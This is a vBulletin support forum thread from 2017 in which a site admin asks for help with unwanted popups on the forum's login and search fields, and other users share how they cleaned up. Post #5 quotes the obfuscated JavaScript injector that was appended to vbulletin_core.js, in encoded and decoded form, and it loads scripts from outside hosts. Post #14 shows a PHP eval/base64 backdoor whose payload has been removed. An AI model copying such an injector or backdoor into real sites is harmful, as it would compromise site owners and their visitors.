Announcement

Collapse
No announcement yet.

Popup injection? (vB 4.2.2 Patch Level 4)

Collapse
This topic is closed.
X
X
  • Filter
  • Time
  • Show
Clear All
new posts

  • [Forum] Popup injection? (vB 4.2.2 Patch Level 4)

    Hello!
    Since yesterday, whenever I try to login on my forums (when I click on the username field) I get a popup ad, which I did not insert myself. It happens not only to me, but to members as well.

    What's strange is that it appears even when I login in the admin panel, or when I try to edit the username of a member in the admin panel. It also appears when you click in the search field.

    I mention I didn't add any new plugin, also I tried disabling all hooks globally and it's still the same. I also removed all banner ads and it was still the same. I looked to see if there are new admin accounts, but it is just mine.

    Other than that, when clicking on the forum pages, no popup appears, just when you click in fields it does.
    I also checked the page source but I could find no weird ad code.

    Here is the page source of the admin login page (it showed 1 popup when I tried to login):
    Code:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
    <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
    <head>
    <title>Log in - Forums - vBulletin Admin Control Panel</title>
    <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
    <link rel="stylesheet" type="text/css" href="../cpstyles/global.css?v=422"/>
    <link rel="stylesheet" type="text/css" href="../cpstyles/vBulletin_3_Silver/controlpanel.css?v=422"/>
    <style type="text/css">.page{background-color:white;color:black;}.time{color:silver;}.feature_management_header{font-size:16px;}#category_title_controls{padding-left:10px;font-weight:bold;font-size:14px;}.picker_overlay{background-color:white;color:black;font-size:14px;padding:3px;border:1px solid black;}.selected_marker{margin-right:4px;margin-top:4px;float:left;}.section_name{font-size:14px;font-weight:bold;padding:0.2em 1em;margin:0.5em 0.2em;background-color:white;}.tcat .picker_overlay a,.picker_overlay a,a.section_switch_link{color:blue;}.tcat .picker_overlay a:hover,.picker_overlay a:hover,a.section_switch_link:hover{color:red;}</style>
    <script type="text/javascript">
    <!--
    var SESSIONHASH = "";
    var ADMINHASH = "045bc1e9e281872e8bfad849f39d19c5";
    var SECURITYTOKEN = "1491851501-375837caf47090c879bd5c64a4f1517ea8de8ab7";
    var IMGDIR_MISC = "../cpstyles/vBulletin_3_Silver";
    var CLEARGIFURL = "./clear.gif";
    var AJAXBASEURL = "http://www.mysite.com/forums/acesadm/../";
    var BBURL = "http://www.mysite.com/forums";
    var PATHS = {
    forum : "",
    cms : "",
    blog : ""
    };
    function set_cp_title()
    {
    if (typeof(parent.document) != 'undefined' && typeof(parent.document) != 'unknown' && typeof(parent.document.title) == 'string')
    {
    parent.document.title = (document.title != '' ? document.title : 'vBulletin');
    }
    }
    //-->
    </script>
    <script type="text/javascript" src="../clientscript/yui/yuiloader-dom-event/yuiloader-dom-event.js"></script>
    <script type="text/javascript" src="../clientscript/yui/connection/connection-min.js"></script>
    <script type="text/javascript" src="../clientscript/vbulletin-core.js"></script>
    <script type="text/javascript" src="../clientscript/vbulletin_ajax_suggest.js"></script>
    </head>
    <body style="margin:0px" onload="set_cp_title(); document.forms.loginform.vb_login_password.focus()">
    <script type="text/javascript" src="../clientscript/vbulletin_md5.js?v=422"></script>
    <script type="text/javascript">
    <!--
    function js_show_options(objectid, clickedelm)
    {
    fetch_object(objectid).style.display = "";
    clickedelm.disabled = true;
    }
    function js_fetch_url_append(origbit,addbit)
    {
    if (origbit.search(/\?/) != -1)
    {
    return origbit + '&' + addbit;
    }
    else
    {
    return origbit + '?' + addbit;
    }
    }
    function js_do_options(formobj)
    {
    if (typeof(formobj.nojs) != "undefined" && formobj.nojs.checked == true)
    {
    formobj.url.value = js_fetch_url_append(formobj.url.value, 'nojs=1');
    }
    return true;
    }
    //-->
    </script>
    <form action="../login.php?do=login" method="post" name="loginform" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf); js_do_options(this)">
    <input type="hidden" name="url" value="/forums/acesadm/index.php"/>
    <input type="hidden" name="s" value="6583ed39a35588cc17041d37a590a7de"/>
    <input type="hidden" name="securitytoken" value="1491851501-375837caf47090c879bd5c64a4f1517ea8de8ab7"/>
    <input type="hidden" name="logintype" value="cplogin"/>
    <input type="hidden" name="do" value="login"/>
    <input type="hidden" name="vb_login_md5password" value=""/>
    <input type="hidden" name="vb_login_md5password_utf" value=""/>
    <p>&nbsp;</p><p>&nbsp;</p>
    <table class="tborder" cellpadding="0" cellspacing="0" border="0" width="450" align="center"><tr><td>
    <div class="tcat" style="padding:4px; text-align:center"><b>Log in</b></div>
    <table cellpadding="4" cellspacing="0" border="0" width="100%" class="navbody">
    <tr valign="bottom">
    <td><img src="../cpstyles/vBulletin_3_Silver/cp_logo.gif" alt="" title="Powered by vBulletin&reg; Version 4.2.2 Copyright &copy; 2017 vBulletin Solutions, Inc. All rights reserved." border="0"/></td>
    <td>
    <b><a href="http://www.mysite.com/forums/forum.php"> Forum</a></b><br/>
    vBulletin 4.2.2 Admin Control Panel<br/>
    &nbsp;
    </td>
    </tr>
    </table>
    <table cellpadding="4" cellspacing="0" border="0" width="100%" class="logincontrols">
    <col width="50%" style="text-align:right; white-space:nowrap"></col>
    <col></col>
    <col width="50%"></col>
    <tbody>
    <tr>
    <td>User Name</td>
    <td><input type="text" style="padding-left:5px; font-weight:bold; width:250px" name="vb_login_username" value="Key" accesskey="u" tabindex="1" id="vb_login_username"/></td>
    <td>&nbsp;</td>
    </tr>
    <tr>
    <td>Password</td>
    <td><input type="password" style="padding-left:5px; font-weight:bold; width:250px" name="vb_login_password" accesskey="p" tabindex="2" id="vb_login_password"/></td>
    <td>&nbsp;</td>
    </tr>
    <tr style="display: none" id="cap_lock_alert">
    <td>&nbsp;</td>
    <td class="tborder"><strong>Caps Lock is on!</strong><br/>
    <br/>
    Having Caps Lock on may cause you to enter your password incorrectly. You should press Caps Lock to turn it off before entering your password.</td>
    <td>&nbsp;</td>
    </tr>
    </tbody>
    <tbody id="loginoptions" style="display:none">
    <tr>
    <td>Style</td>
    <td><select name="cssprefs" class="login" style="padding-left:5px; font-weight:normal; width:250px" tabindex="5"> <option value="vBulletin_2_Default">vBulletin 2 Default</option>
    <option value="vBulletin_3_Default">vBulletin 3 Default</option>
    <option value="vBulletin_3_Frontend">vBulletin 3 Frontend</option>
    <option value="vBulletin_3_Manual">vBulletin 3 Manual</option>
    <option value="" selected="selected">vBulletin 3 Silver</option>
    </select></td>
    <td>&nbsp;</td>
    </tr>
    <tr>
    <td>Options</td>
    <td>
    <label><input type="checkbox" name="nojs" value="1" tabindex="6"/> Save open navigation groups automatically</label>
    </td>
    <td class="login">&nbsp;</td>
    </tr>
    </tbody>
    <tbody>
    <tr>
    <td colspan="3" align="center">
    <input type="submit" class="button" value=" Log in " accesskey="s" tabindex="3"/>
    <input type="button" class="button" value=" Options " accesskey="o" onclick="js_show_options('loginoptions', this)" tabindex="4"/> </td>
    </tr>
    </tbody>
    </table>
    </td></tr></table>
    </form>
    <script type="text/javascript">
    <!--
    function caps_check(e)
    {
    var detected_on = detect_caps_lock(e);
    var alert_box = fetch_object('cap_lock_alert');
    if (alert_box.style.display == '')
    {
    // box showing already, hide if caps lock turns off
    if (!detected_on)
    {
    alert_box.style.display = 'none';
    }
    }
    else
    {
    if (detected_on)
    {
    alert_box.style.display = '';
    }
    }
    }
    fetch_object('vb_login_password').onkeypress = caps_check;
    //-->
    </script>
    </body>
    </html>

    Could the malicious code be inserted in some file that deals with fields? I don't know where to search for it.


    EDIT: I noticed that vbulletin-core.js was modified exactly in the day since when the issue appeared. I uploaded an old version of it (since 2015, when the issue wasn't occurring) but the issue is still the same. However, now, at times, the popup appears if the click is made anywhere on the page, not just in the username or search field.

  • #2
    Hello,

    Please upgrade to vBulletin 4.2.4. Does the problem still exist?

    If it does then follow the steps in https://www.vbulletin.com/forum/foru...ring-your-site
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud customization and demonstration site.
    vBulletin 5 Documentation - Updated every Friday. Report issues here.
    vBulletin 5 API - Full / Mobile
    I am not currently available for vB Messenger Chats.

    Comment


    • #3
      @Ianno

      It could exsite in a .js file or a PHP file is control these so you will not see weird codes when viewing page source

      Even ways that Wayne Luke suggested will not solve the problem.

      To solve this you need to make a fresh of files and folder from vB and check on additional files that you added before, checking on your mysql db too.

      Malware codes could insert into your site/db and they are encrypted so you must find them out to fix the problem completely.

      Hope that helps!

      Web Hosting Forum - Learn web hosting and offering your web hosting plans for free!

      Comment


      • #4
        4.2.2 Patch Level 4 is 2 patches behind the latest 4.2.2 version (Patch Level 6) so your site was certainly able to be compromised.

        You're going to want to follow these blogs for a full cleanup and then to further secure your site, since there is likely one or more backdoors left by hackers on your site-

        http://www.vbulletin.com/forum/blogs...ve-been-hacked

        http://www.vbulletin.com/forum/blogs...vbulletin-site

        Comment


        • #5
          Hello and thanks for the responses!
          I saw when the issue occurred 4 days ago that vbulletin_core was modified. I upgraded the vbulletin version to 4.2.4 (from 4.2.2) and removed vBSEO (as yeah, it's unsupported and vulnerable but since my url structure was heavily customized, I kept avoiding that change).

          The forums worked good for 2 days. Today the popups started appearing again. I ran Diagnostics and found that the only suspect and modified file was vbulletin_core.js again. I checked the file and noticed this code was added at the end of the file:
          var _0xe62f=["\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\ x76\ x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x6F\x65\x69\x31\x2E\x67\x7 1\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65","\x3C\x73\x63\x72\x6 9\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\ x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x6D\x66\x69\x6F\x2E\x63\x66\x22\x3E\x3C\x2F\x7 3\x63\x72\x69\x70\x74\x3E"];document[_0xe62f[1]](_0xe62f[0]);document[_0xe62f[1]](_0xe62f[2])

          The decrypted code looks like this:
          var _0xe62f=["<script type="text/javascript" src="//oei1.gq"></script>","write","<script type="text/javascript" src="//mfio.cf"></script>"];document[_0xe62f[1]](_0xe62f[0]);document[_0xe62f[1]](_0xe62f[2])

          I uploaded a fresh copy of vbulletin_core.js but the popups are still there even with the clean vbulletin_core.js. What should I do? It seems the hacker gets again and again in the vbulletin_core.js, no other administrator was created, the install folder is deleted, I also deleted files I didn't know, my admin and mod folders in vbulletin are renamed. Is it some exploit? How can I possibly prevent them to get access to that file?
          Last edited by Ianno; Thu 13th Apr '17, 6:35pm.

          Comment


          • #6
            Are there any non-vbulletin files on your server? home.php or something like that?
            Translations provided by Google.

            Wayne Luke
            The Rabid Badger - a vBulletin Cloud customization and demonstration site.
            vBulletin 5 Documentation - Updated every Friday. Report issues here.
            vBulletin 5 API - Full / Mobile
            I am not currently available for vB Messenger Chats.

            Comment


            • #7
              No, there is no home.php or anything like that. What should I do, should I resend all the vbulletin files that I sent 2 days ago? Even if I sent the fresh copy of the modified file (vbulletin_core.js), the popups are still there, so I suppose the hacker sneaked the code somewhere else too, I just can't find where.

              I also looked in themes, but I find nothing suspicious. Plus the popups appear on the Default theme as well and even on a freshly installed theme.

              The only theme where popups don't show up is the Mobile theme (the vBulletin one).

              Comment


              • #8
                If they are editing your files then your server is vulnerable somehow. Either you didn't follow all the steps I listed in the topic above, you have bad plugins installed, your passwords are compromised or your server is compromised.
                Translations provided by Google.

                Wayne Luke
                The Rabid Badger - a vBulletin Cloud customization and demonstration site.
                vBulletin 5 Documentation - Updated every Friday. Report issues here.
                vBulletin 5 API - Full / Mobile
                I am not currently available for vB Messenger Chats.

                Comment


                • #9
                  you cleared the cache of your browser after fixing the .js file? javascript files would normally be cached by the browser and not be redownloaded unless the cache was cleared, F5 was held down while refreshing the page, or the version number of VB changed.

                  Comment


                  • #10
                    Yes, I cleared the cache and tried on different browsers too, both me and my members. I changed all my passwords, for server, SSH/SFTP, for vBulletin itself. I re-uploaded all the vBulletin files again and the error was gone again for 3 days, but today the popups are back, and this time /clientscript/vbulletin_md5.js was modified, with that same code added at the end of it, but what is weird is that in SFTP client it didn't even show me the file was modified, but vBulletin did in the Suspect file version.

                    I noticed that the whole /clientscript/ folder is writtable (CHMOD 777). Is that the default permission? If not, which should it be?

                    Comment


                    • #11
                      It shouldn't be chmod 777. It should be at most 755 and the individual files should be 0644. However you have to ask your hosting provider if those work properly.

                      Seems you still have extra files or the server is compromised from elsewhere.
                      Last edited by Wayne Luke; Tue 18th Apr '17, 6:40pm.
                      Translations provided by Google.

                      Wayne Luke
                      The Rabid Badger - a vBulletin Cloud customization and demonstration site.
                      vBulletin 5 Documentation - Updated every Friday. Report issues here.
                      vBulletin 5 API - Full / Mobile
                      I am not currently available for vB Messenger Chats.

                      Comment


                      • #12
                        I'm getting the exact same thing since Friday.

                        I was on 4.2.3, and user complained about this issue, Basically a popup on your first click on the page.

                        I upgraded to 4.2.4 and the issue went away.

                        However it came back today, after finding this thread, I ran the Suspect file version checker and in my case
                        "yuiloader-dom-event.js" showed as having extra data, my file explorer still showed the file modified date as the when I uploaded it on Friday however.

                        I reuploaded that file (0644 BTW) and it was about.5k smaller)

                        Cleared the cache on the browsers and it seems to have done the trick, but there does appear to be an issue I've found mentioned here and on at least one other board during my basic searching about the issue, all in the past month or so.

                        Comment


                        • #13
                          If you have an exploit already installed within your directory and uploaded by your web user, then 0644 won't prevent them from writing to the server. This is why it is important that you manually review every directory of your site for unknown files. They are usually filled with base64 code. We don't use base64 in vBulletin 4. If you have any plugins or addons that use Base64, then you should ditch them as you won't be able to tell what they do easily.

                          For YUI, you can tell the system to load it from a CDN like Google in the Settings under Server Settings and Optimization Options.
                          Translations provided by Google.

                          Wayne Luke
                          The Rabid Badger - a vBulletin Cloud customization and demonstration site.
                          vBulletin 5 Documentation - Updated every Friday. Report issues here.
                          vBulletin 5 API - Full / Mobile
                          I am not currently available for vB Messenger Chats.

                          Comment


                          • #14
                            We managed to find a backdoor in init_startup plugin in vBulletin:

                            if (strpos($_SERVER['PHP_SELF'],"subscriptions.php")) {

                            eval(gzinflate(base64_decode('REMOVED')));

                            exit;
                            }



                            Is it safe to remove all that code and leave just this?
                            if (strpos($_SERVER['PHP_SELF'],"subscriptions.php")) {
                            exit;
                            }

                            I also attach the print screen.
                            Attached Files
                            Last edited by Trevor Hannant; Tue 25th Apr '17, 2:59am. Reason: Base64 code removed

                            Comment

                            Related Topics

                            Collapse

                            Working...
                            X